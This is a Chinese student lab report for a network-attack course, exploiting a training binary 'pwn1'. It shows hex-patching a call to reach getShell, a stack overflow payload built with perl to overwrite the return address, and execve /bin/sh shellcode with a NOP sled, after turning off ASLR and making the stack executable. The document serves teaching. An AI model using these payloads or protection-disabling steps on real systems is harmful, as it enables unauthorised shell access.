2019-2020-2 网络对抗技术 20172327 Exp1 PC平台逆向破解

目录

• 1. 实践目标
• 2. 实践内容
  • 2.1 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
  • 2.2 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
  • 2.3 注入一个自己制作的shellcode并运行这段shellcode
    • 2.3.1 什么是Shellcode？
    • 2.3.2 实验准备
    • 2.3.3 构造攻击buf
• 3. 需要掌握的内容
  • 3.1 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
  • 3.2 掌握反汇编与十六进制编程器
• 4. 实验总结
  • 4.1. 什么是漏洞？漏洞有什么危害？
    • 4.1.1 什么是漏洞：
    • 4.1.2 为什么会存在漏洞：
    • 4.1.3 总结
• 4.2. 实验收获与感想

1. 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

2. 实践内容

2.1 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。

第一步：使用

objdump -d pwn1 | more

命令对实验给定的可执行文件进行反汇编操作，找到主函数位置并定位其调用foo函数的机器指令及相对地址如图：

第二步：
我们还可以在反汇编状态下看到getShell代码段的起始地址

接下来我们要做的就是把原可执行文件中的foo函数调用地址改为getShell函数的调用地址。

第三步：
先用cp pwn1 pwn2拷贝命令把原文件辅助一份，以防出现不可逆修改还得导一份文件进来。vim编辑器打开pwn2来看看，看其中有神马内容。
会发现特别乱，看着眼睛花

第四步：
打开发现这文件中并没有人类可以看懂的语言，那么我们在编辑器命令行中敲入
:%!xxd命令，以16进制代码的形式进行查看，然后利用查找工具/ + 查找信息找到我们刚才反汇编时主函数调用foo的位置.

然后把它改成可以对应getShell函数的地址--->根据计算得出我们需要将d7ffffff改为c3ffffff

第五步：
改完了别忘了把16进制形式转换为原文本，使用:%!xxd -r然后:wq保存并退出编辑器
先不运行程序，我们先来反汇编看看改的结果

第六步：
可以明确的看到原本的调用foo函数已经被我们修改为了调用getShell函数，现在我们运行一下看看会发生什么。

就像是运行程序在其中打开了一个新的命令行一样，我们可以在这个命令行里做任何可进行的操作，比如秘密修改和查看其中的文件^_!!当然这么简单的方法肯定是行不通的。

2.2 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。

foo函数解读：

EBP和ESP是一个函数的栈底和栈顶，在子函数EBP上方是主函数的EBP, 返回地址和参数. EBP下方则是临时变量. 函数返回时作 mov esp,ebp（把esp栈顶地址给ebp，这样栈底和栈顶一样了，就丢掉栈内数值，然后 pop ebp （出栈，栈指针在子函数退出后，就指向主函数的栈顶）， 然后ret 结束符，子函数就结束了

ESP 专门用作堆栈指针，被形象地称为栈顶指针，堆栈的顶部是地址小的区域，压入堆栈的数据越多，ESP也就越来越小。在32位平台上，ESP每次减少4字节。

0x1c就是预申请的栈空间，转成十进制,大小是28 字节。用来保存用户输入的，如果允许栈输入越界，用户输入就会覆盖到下一条指令的数据区，就是下一行的call指令，0x08084a8这行call调用子函数的指令，原本是输出字符串的，地址变成getShell的地址，就可以攻击的目的。

第一步：
首先再复制一个pwn1，命名位pwn3.我们使用gdb调试运行程序，然后在调试状态下输入r使得程序运行

第二步：
我输入的是八个1，八个2，八个3，七个4和数字1到8然后在调试状态下输入info r显示各个寄存器状态，这时我们可以看到由于输入字符串大于缓冲区，导致eip也就是返回地址指针位置的值已经改变了，而当前的0x35343332正好是数字5 4 3 2的ASCII码，对照我们我们输入的字符串，正好是第33到37个数字的位置正好可以覆盖程序中的返回地址，也就是说我们把这几位替换为getShel函数的对应地址就可以完成前面的操作了。

第三步：
根据前面使用反汇编看到的结果，我们知道getShell的地址为0x0804847d,然后我们只需要把这一串十六进制码前面填充32个任意字符再输入到foo 函数里就可以了，但是这时我们会发现，程序执行时是没办法输入十六进制数的，所以我们需要构造一个文件放入这些东西，然后把文件中的内容输入到程序里，这时我们用到了一个脚本语言perl，输入以下命令

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

第四步：
将代码和填充数据保存到一个名为input的文件中，利用cat命令和|管道执 行程序就可以得到和第一种方法一样的结果。

(cat input; cat) | ./pwn3 

2.3 注入一个自己制作的shellcode并运行这段shellcode

2.3.1 什么是Shellcode？

• shellcode就是一段机器指令（code）
• 通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），
• 所以这段机器指令被称为shellcode。
• 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

2.3.2 实验准备

在老师的实验指导中给出了一段Shellcode代码的机器指令，我们就以此来做这次的实验，代码如下：

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

输入apt-get install execstack安装栈的相关文件

1. 输入cp pwn1 pwn4回到实验一目录，复制pwn1，将pwn4作为实验所用文件

2. 输入execstack -s pwn4设置堆栈可行

3. 输入execstack -q pwn4查询pwn4文件的堆栈是否可执行他会返回x pwn4文件名

4. 输入more /proc/sys/kernel/randomize_va_space查看地址随机化信息，返回值为2

5. 输入echo "0" > /proc/sys/kernel/randomize_va_space停用它，然后再输入more /proc/sys/kernel/randomize_va_space查询下信息,此时返回值为0

6. 此时，准备工作完成。

2.3.3 构造攻击buf

根据前面实验的结果我们知道覆盖源程序缓冲区需要的字符个数为32个，而第33到37个字节正好可以覆盖到返回地址的位置上。这样我们就可以构造一个攻击buf输入到源程序中，使得源程序返回地址变为我们注入Shellcode代码位置，我们就可以达到攻击目的。

buf格式：anything + retaddr + nops + shellcode

注：


.1.anything为32字节的任意字符，用于填充源程序中的smilbuf的

2.retaddr为跳转到shellcode代码的地址

3.nops为任意个空字符，可以作为滑行区，当retaddr中的代码使程序跳转到任意个空字符上时，都可以一直滑行到我们注入的

4.Shellcode的位置，并执行Shellcode为我们注入的攻击代码，该实验中是打开被攻击计算机的命令行

1.先根据上述构造buf，我们构造的部分为：
A（32个）+ 1234 + nop（4个） + Shellcode

2.使用perl脚本生成攻击buf的文件，文件名为input_Shellcode:

3.开启两个命令行，在一个命令行中输入

(cat input_Shellcode;cat) | ./pwn1

也就是以文件input_Shellcode的内容作为pwn1程序运行的输入，然后在另一个命令行中输入

ps -ef | grep pwn4

查询出pwn1程序运行时所使用的进程号
然后开启gdb调试，并使用attach定位程序

4.设置断点，查看注入buf的内存地址

• 先反汇编foo函数disassemble foo，在函数执行结束处设置断点break *0x080484ae，然后c即Continuing让程序继续执行到断点处，然后我们输入info r查看寄存器状态可以看到esp中保存的指针值，然后用x/16x + 指针值来查看其中的数据

• 可以发现这个位置保存的正好是我们构造buf中的1234的ASCII码，再往后看就能看到我们的Shellcode代码，这样的话我们只需要把1234这个位置的代码改成后面任意一个nop的地址就可以完成攻击了。

• 由上图可以看到eip寄存器中保存数据的地址，该地址中保存的是第一个字节的值，所以想要跳转到任意一个nop需要在这个地址的基础上再加4。
  

• 修改之后再运行就可以看到我们的想要的效果了。0xffffd62c+4=0xffffd630
  

3. 需要掌握的内容

3.1 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码

• NOP指令：“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。
• JNE指令：条件转移指令，如果不相等则跳转。
• JE指令：条件转移指令，如果相等则跳转。
• JMP指令：无条件跳转指令。无条件跳转指令可转到内存中任何程序段。转移地址可在指令中给出，也可以在寄存器中给出，或在存储器中指出。
• CMP指令：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
  该开始做什么新的事情？

3.2 掌握反汇编与十六进制编程器

反汇编主要使用的命令为objdump具体参数描述如下：

objdump -f test     //显示test的文件头信息
objdump -d test    //反汇编test中的需要执行指令的那些section
objdump -D test    //与-d类似，但反汇编test中的所有section
objdump -h test    //显示test的Section Header信息
objdump -x test    //显示test的全部Header信息
objdump -s test    //除了显示test的全部Header信息，还显示他们对应的十六进制文件代码

十六进制编辑器主要使用Linux的文本编辑器vim，可以在文档中输入:%!xxd和:%!xxd -r来进行十六进制的转换和恢复。

4. 实验总结

4.1. 什么是漏洞？漏洞有什么危害？

4.1.1 什么是漏洞：

漏洞即某个程序(包括操作系统)在设计时未考虑周全，当程序遇到一个看似合理，但实际无法处理的问题时，引发的不可预见的错误。系统漏洞又称安全缺陷，对用户造成的不良后果如下所述：

如漏洞被恶意用户利用，会造成信息泄漏，如黑客攻击网站即利用网络服务器操作系统的漏洞。

对用户操作造成不便，如不明原因的死机和丢失文件等。

4.1.2 为什么会存在漏洞：

漏洞的产生大致有三个原因，具体如下所述：

编程人员的人为因素，在程序编写过程，为实现不可告人的目的，在程序代码的隐蔽处保留后门。

受编程人员的能力、经验和当时安全技术所限，在程序中难免会有不足之处，轻则影响程序效率，重则导致非授权用户的权限提升。

由于硬件原因，使编程人员无法弥补硬件的漏洞，从而使硬件的问题通过软件表现。

4.1.3 总结

当然，Windows漏洞层出不穷也有其客观原因，即任何事物都非十全十美，作为应用于桌面的操作系统——Windows也是如此，且由于其在桌面操作系统的垄断地位，使其存在的问题会很快暴露。此外和Linux等开放源码的操作系统相比，Windows属于暗箱操作，普通用户无法获取源代码，因此安全问题均由微软自身解决。

4.2. 实验收获与感想

通过本次实验让我在一个新的层次上理解了网络攻击的流程，在具体的实验操作中实现了简单的缓冲区溢出攻击，在感叹它的神奇之处的同时也增长了网络安全方面的知识，感觉收获颇丰。